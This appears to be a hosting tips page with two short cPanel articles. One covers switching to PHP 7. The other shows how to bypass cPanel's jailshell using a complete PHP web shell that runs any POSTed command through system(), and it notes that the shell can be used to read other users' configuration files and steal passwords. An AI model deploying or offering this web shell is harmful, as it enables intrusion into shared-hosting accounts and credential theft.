Image

cPanel

How to use PHP 7 in cPanel hosting

By  •  cPanel

cPanel ships with PHP 7, but PHP 5 is still used by default instead. Even if you don’t use PHP 7 specific functions, the performance benefit that PHP 7 brings is a good enough reason to switch. This is especially important in shared hosting such as cPanel as performance is especially lacking.

Make sure your application is compatible with PHP 7 before making the switch.

To start using PHP 7 within your cPanel hosting, log in to cPanel and follow these steps;

  1. Go to the Software section and click on Select PHP Version.
  2. Here you’ll see the PHP version used for your cPanel hosting. Click on the select box, and choose 7.0 or whatever latest version of PHP version available.
  3. Click Set as current for the changes to be effective, and notice Current PHP version in the example is now 7.0.
  4. Check your current PHP version to confirm.

How to bypass cPanel Jailshell using PHP

By  •  cPanel

Users registering for shared Linux webhosting accounts are normally not provided with shell access. Even if they do, what they can do with the shell is limited, as they are only in a jailed environment, thanks to cPanel’s jailshell. Displaying the SHELL variable at the command prompt verifies this;

$ echo $SHELL
/usr/local/cpanel/bin/jailshell

To briefly show what it means, listing out home directories using the following Linux command reveals that the user is alone in the shell.

$ ls /home/ | wc -l
1

With some simple HTML and PHP, a web based shell can offer something more to the users. The following code can be made available through http://www.anyserver.com/jailshell.php;

<html>
  <body>
    <p>Enter command:
      <form action="jailshell.php" method=post>
      <input type=text name=command>
      <input type=submit name=submit>
      </form>
    </p>
    <pre>
      <?php system ($_POST['command']); ?>
    </pre>
  </body>
</html>

and executing some simple commands as the following shows what it’s capable of.

People with malicious intent can use this method to search other user’s home directories and grep into their web application’s configuration file to steal passwords and other juicy informations.

Most hosting providers already disable system() and other similar functions in their PHP implementation.

Top